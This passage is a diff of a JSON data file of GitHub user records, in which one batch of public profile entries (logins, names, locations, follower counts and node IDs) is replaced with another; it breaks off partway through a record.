"fields": { - "nest_created_at": "2024-09-12T00:32:24.068Z", - "nest_updated_at": "2024-09-12T00:32:24.068Z", - "name": "Or Cohen", - "login": "orarch", + "nest_created_at": "2024-09-22T08:43:34.326Z", + "nest_updated_at": "2024-09-22T19:28:17.883Z", + "name": "Justin Rimel", + "login": "jrimel", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6950413?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7400329?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -409943,9 +668242,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2014-03-14T10:47:29Z", - "updated_at": "2024-09-11T21:05:00Z", - "node_id": "MDQ6VXNlcjY5NTA0MTM=", + "created_at": "2014-04-24T23:44:44Z", + "updated_at": "2024-07-02T15:17:38Z", + "node_id": "MDQ6VXNlcjc0MDAzMjk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409953,24 +668252,24 @@ }, { "model": "github.user", - "pk": 1989, + "pk": 7294, "fields": { - "nest_created_at": "2024-09-12T00:32:25.298Z", - "nest_updated_at": "2024-09-12T00:32:25.298Z", - "name": "", - "login": "thomasredlin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107438763?v=4", + "nest_created_at": "2024-09-22T08:43:34.638Z", + "nest_updated_at": "2024-09-22T19:28:18.199Z", + "name": "Ulrich Vandenhekke", + "login": "phoenix741", + "email": "ulrich.vdh@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1161123?v=4", "company": "", - "location": "", + "location": "France", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-06-13T20:57:35Z", - "updated_at": "2024-09-09T09:57:17Z", - "node_id": "U_kgDOBmdiqw", + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2011-10-30T18:23:29Z", + "updated_at": "2024-09-14T07:51:12Z", + "node_id": "MDQ6VXNlcjExNjExMjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409978,24 +668277,24 @@ }, { "model": "github.user", - "pk": 1990, + "pk": 7295, "fields": { - "nest_created_at": "2024-09-12T00:32:26.512Z", - "nest_updated_at": "2024-09-12T00:32:26.512Z", - "name": "Viktor Thell", - "login": "viktorgunnarson", + "nest_created_at": "2024-09-22T08:43:34.958Z", + "nest_updated_at": "2024-09-22T19:28:18.528Z", + "name": "Srinivasa Raghavan", + "login": "VSrinivasaRaghavan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3408082?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38153225?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-01-28T16:59:23Z", - "updated_at": "2024-08-12T11:42:07Z", - "node_id": "MDQ6VXNlcjM0MDgwODI=", + "public_repositories_count": 12, + "created_at": "2018-04-07T08:00:50Z", + "updated_at": "2024-09-20T12:01:12Z", + "node_id": "MDQ6VXNlcjM4MTUzMjI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410003,49 +668302,49 @@ }, { "model": "github.user", - "pk": 1991, + "pk": 7296, "fields": { - "nest_created_at": "2024-09-12T00:32:28.971Z", - "nest_updated_at": "2024-09-12T00:32:28.971Z", - "name": "Justin Beeson", - "login": "thisjustin816", - "email": "justinbeeson@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/41129295?v=4", - "company": "TIH", - "location": "San Diego, CA", + "nest_created_at": "2024-09-22T08:43:35.934Z", + "nest_updated_at": "2024-09-22T19:28:19.473Z", + "name": "Christoph Sassenberg", + "login": "defsprite", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/165219?v=4", + "company": "", + "location": "Berlin", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 2, - "public_repositories_count": 11, - "created_at": "2018-07-11T21:08:12Z", - "updated_at": "2024-05-31T13:03:03Z", - "node_id": "MDQ6VXNlcjQxMTI5Mjk1", - "bio": "Platform Engineer, with a focus on Azure environments and PowerShell.", - "is_hireable": false, - "twitter_username": "thisjustin816" + "following_count": 18, + "followers_count": 26, + "public_gists_count": 4, + "public_repositories_count": 49, + "created_at": "2009-12-09T20:49:44Z", + "updated_at": "2024-07-19T09:27:53Z", + "node_id": "MDQ6VXNlcjE2NTIxOQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1992, + "pk": 7297, "fields": { - "nest_created_at": "2024-09-12T00:32:30.156Z", - "nest_updated_at": "2024-09-12T00:32:30.156Z", - "name": "", - "login": "Dnu12", + "nest_created_at": "2024-09-22T08:43:36.589Z", + "nest_updated_at": "2024-09-22T19:35:43.238Z", + "name": "Tilmann H.", + "login": "xthk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28951334?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5803044?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-05-25T11:55:17Z", - "updated_at": "2024-08-30T15:54:20Z", - "node_id": "MDQ6VXNlcjI4OTUxMzM0", + "public_repositories_count": 9, + "created_at": "2013-10-29T11:18:32Z", + "updated_at": "2024-06-11T07:51:56Z", + "node_id": "MDQ6VXNlcjU4MDMwNDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410053,24 +668352,24 @@ }, { "model": "github.user", - "pk": 1993, + "pk": 7298, "fields": { - "nest_created_at": "2024-09-12T00:32:31.354Z", - "nest_updated_at": "2024-09-12T00:32:31.354Z", - "name": "Lars Bruun-Hansen", - "login": "lbruun", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32431476?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:43:36.900Z", + "nest_updated_at": "2024-09-22T19:28:20.419Z", + "name": "Michal Srb", + "login": "msrb", + "email": "michal@redhat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3759039?v=4", + "company": "Red Hat", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 2, - "public_repositories_count": 39, - "created_at": "2017-10-01T11:05:30Z", - "updated_at": "2024-08-05T08:35:22Z", - "node_id": "MDQ6VXNlcjMyNDMxNDc2", + "following_count": 19, + "followers_count": 35, + "public_gists_count": 45, + "public_repositories_count": 253, + "created_at": "2013-03-03T23:02:19Z", + "updated_at": "2024-08-31T17:25:15Z", + "node_id": "MDQ6VXNlcjM3NTkwMzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410078,24 +668377,24 @@ }, { "model": "github.user", - "pk": 1994, + "pk": 7299, "fields": { - "nest_created_at": "2024-09-12T00:32:32.540Z", - "nest_updated_at": "2024-09-12T00:32:32.540Z", - "name": "Sabuhi Gurbani", - "login": "sabuhigr", + "nest_created_at": "2024-09-22T08:43:37.217Z", + "nest_updated_at": "2024-09-22T19:28:20.733Z", + "name": "Michael Werner", + "login": "Xaseron", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51547928?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1352894?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, + "following_count": 19, + "followers_count": 16, "public_gists_count": 1, - "public_repositories_count": 11, - "created_at": "2019-06-09T23:50:11Z", - "updated_at": "2023-08-15T07:20:25Z", - "node_id": "MDQ6VXNlcjUxNTQ3OTI4", + "public_repositories_count": 41, + "created_at": "2012-01-19T12:36:56Z", + "updated_at": "2024-08-13T13:28:05Z", + "node_id": "MDQ6VXNlcjEzNTI4OTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410103,24 +668402,24 @@ }, { "model": "github.user", - "pk": 1995, + "pk": 7300, "fields": { - "nest_created_at": "2024-09-12T00:32:33.724Z", - "nest_updated_at": "2024-09-12T00:32:33.724Z", - "name": "", - "login": "AbhilashR2020", + "nest_created_at": "2024-09-22T08:43:37.568Z", + "nest_updated_at": "2024-09-22T19:28:21.046Z", + "name": "Charlie Fairchild", + "login": "cfairchild", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9784970?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4365986?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 43, - "created_at": "2014-11-16T15:52:58Z", - "updated_at": "2024-08-02T06:19:14Z", - "node_id": "MDQ6VXNlcjk3ODQ5NzA=", + "public_repositories_count": 0, + "created_at": "2013-05-07T14:23:00Z", + "updated_at": "2021-07-29T14:03:31Z", + "node_id": "MDQ6VXNlcjQzNjU5ODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410128,24 +668427,24 @@ }, { "model": "github.user", - "pk": 1996, + "pk": 7301, "fields": { - "nest_created_at": "2024-09-12T00:32:36.106Z", - "nest_updated_at": "2024-09-12T00:32:36.106Z", - "name": "Reuben Abela", - "login": "reubenbubu", + "nest_created_at": "2024-09-22T08:43:38.196Z", + "nest_updated_at": "2024-09-22T19:28:21.741Z", + "name": "Alix Lourme", + "login": "axel3rd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3941381?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2912441?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 6, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2013-03-22T13:21:56Z", - "updated_at": "2024-03-19T09:40:48Z", - "node_id": "MDQ6VXNlcjM5NDEzODE=", + "public_repositories_count": 8, + "created_at": "2012-11-28T14:13:45Z", + "updated_at": "2023-08-29T21:46:13Z", + "node_id": "MDQ6VXNlcjI5MTI0NDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410153,24 +668452,49 @@ }, { "model": "github.user", - "pk": 1997, + "pk": 7302, "fields": { - "nest_created_at": "2024-09-12T00:32:36.926Z", - "nest_updated_at": "2024-09-12T00:32:36.926Z", - "name": "Mathias", - "login": "Oxydation", + "nest_created_at": "2024-09-22T08:43:38.513Z", + "nest_updated_at": "2024-09-22T19:28:22.053Z", + "name": "Chad Van Wyhe", + "login": "chadjvw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8331862?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1483653?v=4", + "company": "@aws", + "location": "United States", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 4, + "public_gists_count": 6, + "public_repositories_count": 19, + "created_at": "2012-02-29T00:42:35Z", + "updated_at": "2024-08-28T11:23:12Z", + "node_id": "MDQ6VXNlcjE0ODM2NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7303, + "fields": { + "nest_created_at": "2024-09-22T08:43:38.835Z", + "nest_updated_at": "2024-09-22T19:28:22.368Z", + "name": "Arend v. Reinersdorff", + "login": "arend-von-reinersdorff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4946561?v=4", "company": "", - "location": "Austria", + "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2014-08-01T16:39:26Z", - "updated_at": "2024-09-04T05:40:30Z", - "node_id": "MDQ6VXNlcjgzMzE4NjI=", + "public_repositories_count": 14, + "created_at": "2013-07-05T07:45:30Z", + "updated_at": "2024-09-11T20:08:53Z", + "node_id": "MDQ6VXNlcjQ5NDY1NjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410178,24 +668502,49 @@ }, { "model": "github.user", - "pk": 1998, + "pk": 7304, "fields": { - "nest_created_at": "2024-09-12T00:32:38.160Z", - "nest_updated_at": "2024-09-12T00:32:38.160Z", - "name": "Armanit Garg", - "login": "rmn7", + "nest_created_at": "2024-09-22T08:43:39.154Z", + "nest_updated_at": "2024-09-22T19:28:22.689Z", + "name": "Christian Galsterer", + "login": "christiangalsterer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20014592?v=4", - "company": "@implydata ", + "avatar_url": "https://avatars.githubusercontent.com/u/4999431?v=4", + "company": "", + "location": "Munich", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 27, + "public_gists_count": 11, + "public_repositories_count": 44, + "created_at": "2013-07-12T19:50:49Z", + "updated_at": "2024-08-27T11:26:49Z", + "node_id": "MDQ6VXNlcjQ5OTk0MzE=", + "bio": "Software/Cloud architect, agile evangelist and team manager designing and implementing microservice based systems in Java, Spring, Kafka Go, React, Kubernetes.", + "is_hireable": true, + "twitter_username": "GalstererC" + } +}, +{ + "model": "github.user", + "pk": 7305, + "fields": { + "nest_created_at": "2024-09-22T08:43:39.472Z", + "nest_updated_at": "2024-09-22T19:28:22.995Z", + "name": "Emeric MARTINEAU", + "login": "emeric-martineau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11473190?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 24, - "followers_count": 22, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2016-06-18T14:12:28Z", - "updated_at": "2024-06-17T11:28:37Z", - "node_id": "MDQ6VXNlcjIwMDE0NTky", + "following_count": 0, + "followers_count": 10, + "public_gists_count": 4, + "public_repositories_count": 49, + "created_at": "2015-03-14T10:53:27Z", + "updated_at": "2024-08-20T15:04:38Z", + "node_id": "MDQ6VXNlcjExNDczMTkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410203,24 +668552,24 @@ }, { "model": "github.user", - "pk": 1999, + "pk": 7306, "fields": { - "nest_created_at": "2024-09-12T00:32:39.761Z", - "nest_updated_at": "2024-09-12T00:33:55.532Z", - "name": "Markus Szumovski", - "login": "echalone", - "email": "echalone@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6392389?v=4", + "nest_created_at": "2024-09-22T08:43:40.426Z", + "nest_updated_at": "2024-09-22T19:28:23.964Z", + "name": "", + "login": "lindholm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1335302?v=4", "company": "", - "location": "Vienna, Austria", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2014-01-13T18:44:35Z", - "updated_at": "2024-05-30T13:05:45Z", - "node_id": "MDQ6VXNlcjYzOTIzODk=", + "public_repositories_count": 6, + "created_at": "2012-01-17T00:31:44Z", + "updated_at": "2021-04-03T07:05:13Z", + "node_id": "MDQ6VXNlcjEzMzUzMDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410228,99 +668577,99 @@ }, { "model": "github.user", - "pk": 2000, + "pk": 7307, "fields": { - "nest_created_at": "2024-09-12T00:32:41.427Z", - "nest_updated_at": "2024-09-12T00:32:41.427Z", - "name": "Liam Williams", - "login": "theangrydev", + "nest_created_at": "2024-09-22T08:43:40.736Z", + "nest_updated_at": "2024-09-22T19:28:24.283Z", + "name": "Igor Stepanov", + "login": "stepio", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6877541?v=4", - "company": "@trafficparrot", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/5202414?v=4", + "company": "Google", + "location": "London, UK", "collaborators_count": 0, - "following_count": 10, - "followers_count": 24, + "following_count": 14, + "followers_count": 14, "public_gists_count": 2, - "public_repositories_count": 96, - "created_at": "2014-03-06T21:58:07Z", - "updated_at": "2024-09-04T12:18:16Z", - "node_id": "MDQ6VXNlcjY4Nzc1NDE=", - "bio": "Changing the world, one character at a time...", + "public_repositories_count": 31, + "created_at": "2013-08-10T09:54:29Z", + "updated_at": "2024-09-03T11:27:22Z", + "node_id": "MDQ6VXNlcjUyMDI0MTQ=", + "bio": "skype: stepio.ua", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2001, + "pk": 7308, "fields": { - "nest_created_at": "2024-09-12T00:32:42.626Z", - "nest_updated_at": "2024-09-12T00:32:42.626Z", - "name": "Abhijat Chaturvedi", - "login": "abhijatchaturvedi", + "nest_created_at": "2024-09-22T08:43:41.092Z", + "nest_updated_at": "2024-09-22T19:28:24.605Z", + "name": "Paul Irwin", + "login": "paulirwin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51148813?v=4", - "company": "CDAC-IIT", - "location": "New Delhi, NCR, India", + "avatar_url": "https://avatars.githubusercontent.com/u/1874103?v=4", + "company": "@feature23", + "location": "Colorado, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-05-29T05:24:51Z", - "updated_at": "2024-07-11T07:02:34Z", - "node_id": "MDQ6VXNlcjUxMTQ4ODEz", - "bio": "Researcher in the field of machine learning, artificial intelligence and deep learning. Have an interest in Data Science.", - "is_hireable": false, + "following_count": 14, + "followers_count": 55, + "public_gists_count": 17, + "public_repositories_count": 90, + "created_at": "2012-06-20T20:35:09Z", + "updated_at": "2024-09-19T21:32:29Z", + "node_id": "MDQ6VXNlcjE4NzQxMDM=", + "bio": "CTO at @feature23, Founder @COTB", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2002, + "pk": 7309, "fields": { - "nest_created_at": "2024-09-12T00:32:45.031Z", - "nest_updated_at": "2024-09-12T00:32:45.031Z", - "name": "Akash Rokade", - "login": "Akash-2001-git", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40690768?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:43:42.085Z", + "nest_updated_at": "2024-09-22T19:28:25.582Z", + "name": "Marcel Richter", + "login": "mrclrchtr", + "email": "mail@mrclrchtr.de", + "avatar_url": "https://avatars.githubusercontent.com/u/16151098?v=4", + "company": "Octalog", + "location": "Darmstadt", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-06-29T10:27:20Z", - "updated_at": "2024-04-03T11:45:42Z", - "node_id": "MDQ6VXNlcjQwNjkwNzY4", - "bio": "", + "following_count": 6, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2015-12-04T11:48:55Z", + "updated_at": "2024-09-04T17:34:07Z", + "node_id": "MDQ6VXNlcjE2MTUxMDk4", + "bio": "Kotlin Developer 👷🏼‍♂️ and Cloud Enthusiast ☁️ with a passion for pipeline and build optimization 🏗️ and k8s ☸", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2003, + "pk": 7310, "fields": { - "nest_created_at": "2024-09-12T00:32:47.450Z", - "nest_updated_at": "2024-09-12T00:32:47.450Z", + "nest_created_at": "2024-09-22T08:43:43.087Z", + "nest_updated_at": "2024-09-22T19:28:26.640Z", "name": "", - "login": "ahmedElmaghr", + "login": "Jonpez2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43854150?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6016373?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2018-10-04T14:29:05Z", - "updated_at": "2024-06-11T16:29:54Z", - "node_id": "MDQ6VXNlcjQzODU0MTUw", + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2013-11-23T08:36:04Z", + "updated_at": "2024-09-12T14:49:43Z", + "node_id": "MDQ6VXNlcjYwMTYzNzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410328,74 +668677,74 @@ }, { "model": "github.user", - "pk": 2004, + "pk": 7311, "fields": { - "nest_created_at": "2024-09-12T00:32:49.982Z", - "nest_updated_at": "2024-09-12T00:32:49.982Z", - "name": "", - "login": "clayton-piscopo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17902323?v=4", + "nest_created_at": "2024-09-22T08:43:43.396Z", + "nest_updated_at": "2024-09-22T19:28:26.952Z", + "name": "Jonas Berg", + "login": "MrBerg", + "email": "jonas.berg@relex.fi", + "avatar_url": "https://avatars.githubusercontent.com/u/2547119?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2016-03-17T10:45:12Z", - "updated_at": "2023-12-05T09:28:05Z", - "node_id": "MDQ6VXNlcjE3OTAyMzIz", + "following_count": 4, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 23, + "created_at": "2012-10-12T19:28:59Z", + "updated_at": "2024-05-21T11:35:38Z", + "node_id": "MDQ6VXNlcjI1NDcxMTk=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2005, + "pk": 7312, "fields": { - "nest_created_at": "2024-09-12T00:32:52.334Z", - "nest_updated_at": "2024-09-12T00:32:52.334Z", - "name": "", - "login": "Casperxian", + "nest_created_at": "2024-09-22T08:43:43.707Z", + "nest_updated_at": "2024-09-22T19:28:27.264Z", + "name": "Johann Schmitz", + "login": "ercpe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152158588?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1290183?v=4", "company": "", - "location": "", + "location": "Düsseldorf, Germany", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-27T08:21:32Z", - "updated_at": "2024-04-03T07:28:32Z", - "node_id": "U_kgDOCRHBfA", - "bio": "", - "is_hireable": false, + "followers_count": 20, + "public_gists_count": 2, + "public_repositories_count": 75, + "created_at": "2011-12-28T10:40:13Z", + "updated_at": "2024-01-31T05:19:24Z", + "node_id": "MDQ6VXNlcjEyOTAxODM=", + "bio": "Software developer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2006, + "pk": 7313, "fields": { - "nest_created_at": "2024-09-12T00:32:53.533Z", - "nest_updated_at": "2024-09-12T00:32:53.533Z", - "name": "Laura", - "login": "lorriborri", + "nest_created_at": "2024-09-22T08:43:44.019Z", + "nest_updated_at": "2024-09-22T19:28:27.575Z", + "name": "", + "login": "JeneJasper", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46646462?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/21266328?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2019-01-13T11:25:13Z", - "updated_at": "2024-09-10T10:18:10Z", - "node_id": "MDQ6VXNlcjQ2NjQ2NDYy", + "created_at": "2016-08-26T17:21:21Z", + "updated_at": "2022-05-02T15:26:08Z", + "node_id": "MDQ6VXNlcjIxMjY2MzI4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410403,99 +668752,99 @@ }, { "model": "github.user", - "pk": 2007, + "pk": 7314, "fields": { - "nest_created_at": "2024-09-12T00:32:54.750Z", - "nest_updated_at": "2024-09-12T01:15:44.069Z", - "name": "Andrey", - "login": "AndreyMZ", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9609370?v=4", + "nest_created_at": "2024-09-22T08:43:44.330Z", + "nest_updated_at": "2024-09-22T19:28:27.885Z", + "name": "Jan Philipp", + "login": "knalli", + "email": "knallisworld@googlemail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/65389?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 28, - "created_at": "2014-11-07T13:14:23Z", - "updated_at": "2024-08-29T12:11:58Z", - "node_id": "MDQ6VXNlcjk2MDkzNzA=", + "following_count": 28, + "followers_count": 73, + "public_gists_count": 41, + "public_repositories_count": 75, + "created_at": "2009-03-20T20:52:14Z", + "updated_at": "2024-09-22T11:24:22Z", + "node_id": "MDQ6VXNlcjY1Mzg5", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "knalli" } }, { "model": "github.user", - "pk": 2008, + "pk": 7315, "fields": { - "nest_created_at": "2024-09-12T00:32:56.485Z", - "nest_updated_at": "2024-09-12T00:32:56.485Z", - "name": "Henrik Torland Klev", - "login": "henrik-klev", + "nest_created_at": "2024-09-22T08:43:44.757Z", + "nest_updated_at": "2024-09-22T19:28:28.225Z", + "name": "Jan Hill", + "login": "Janpopan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106068062?v=4", - "company": "@PayEx", - "location": "Oslo", + "avatar_url": "https://avatars.githubusercontent.com/u/1523002?v=4", + "company": "adesso SE", + "location": "Berlin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 9, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-05-23T09:03:16Z", - "updated_at": "2024-09-03T11:46:23Z", - "node_id": "U_kgDOBlJ4Xg", - "bio": "You should hire me. I'm incredible.", + "public_repositories_count": 14, + "created_at": "2012-03-10T12:23:47Z", + "updated_at": "2024-09-02T11:22:12Z", + "node_id": "MDQ6VXNlcjE1MjMwMDI=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2009, + "pk": 7316, "fields": { - "nest_created_at": "2024-09-12T00:32:57.675Z", - "nest_updated_at": "2024-09-12T00:32:57.675Z", - "name": "Joerg Heinicke", - "login": "JoergHeinicke5005", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53432510?v=4", + "nest_created_at": "2024-09-22T08:43:45.393Z", + "nest_updated_at": "2024-09-22T20:31:41.023Z", + "name": "Jakub Wilk", + "login": "jwilk", + "email": "jwilk@jwilk.net", + "avatar_url": "https://avatars.githubusercontent.com/u/141546?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-07-29T11:29:37Z", - "updated_at": "2024-09-10T08:39:15Z", - "node_id": "MDQ6VXNlcjUzNDMyNTEw", + "public_gists_count": 4, + "public_repositories_count": 169, + "created_at": "2009-10-19T06:59:32Z", + "updated_at": "2024-09-22T17:37:31Z", + "node_id": "MDQ6VXNlcjE0MTU0Ng==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2010, + "pk": 7317, "fields": { - "nest_created_at": "2024-09-12T00:32:58.876Z", - "nest_updated_at": "2024-09-12T00:32:58.876Z", - "name": "", - "login": "ngybnc", + "nest_created_at": "2024-09-22T08:43:45.715Z", + "nest_updated_at": "2024-09-22T19:28:29.169Z", + "name": "AJ Banck", + "login": "ajbanck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44839908?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5928205?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-11-07T13:34:12Z", - "updated_at": "2024-07-17T06:05:12Z", - "node_id": "MDQ6VXNlcjQ0ODM5OTA4", + "public_repositories_count": 23, + "created_at": "2013-11-13T10:29:52Z", + "updated_at": "2023-02-01T16:28:36Z", + "node_id": "MDQ6VXNlcjU5MjgyMDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410503,24 +668852,24 @@ }, { "model": "github.user", - "pk": 2011, + "pk": 7318, "fields": { - "nest_created_at": "2024-09-12T00:33:00.129Z", - "nest_updated_at": "2024-09-12T00:33:00.129Z", - "name": "", - "login": "eliassal", + "nest_created_at": "2024-09-22T08:43:46.364Z", + "nest_updated_at": "2024-09-22T19:28:29.790Z", + "name": "Rick Oosterholt", + "login": "oosterholt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8447864?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/730953?v=4", "company": "", - "location": "", + "location": "the Netherlands", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 72, - "created_at": "2014-08-14T10:50:41Z", - "updated_at": "2024-09-10T11:29:15Z", - "node_id": "MDQ6VXNlcjg0NDc4NjQ=", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2011-04-15T06:49:29Z", + "updated_at": "2024-03-26T11:18:00Z", + "node_id": "MDQ6VXNlcjczMDk1Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410528,24 +668877,24 @@ }, { "model": "github.user", - "pk": 2012, + "pk": 7319, "fields": { - "nest_created_at": "2024-09-12T00:33:03.383Z", - "nest_updated_at": "2024-09-12T00:33:03.383Z", - "name": "", - "login": "amanske-ada", + "nest_created_at": "2024-09-22T08:43:46.681Z", + "nest_updated_at": "2024-09-22T19:28:30.109Z", + "name": "Rick van der Hoorn", + "login": "rvdhoornCaesar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111569011?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25002065?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-08-19T09:41:04Z", - "updated_at": "2024-07-05T10:42:31Z", - "node_id": "U_kgDOBqZocw", + "public_repositories_count": 9, + "created_at": "2017-01-09T07:38:48Z", + "updated_at": "2024-08-14T13:04:03Z", + "node_id": "MDQ6VXNlcjI1MDAyMDY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410553,24 +668902,49 @@ }, { "model": "github.user", - "pk": 2013, + 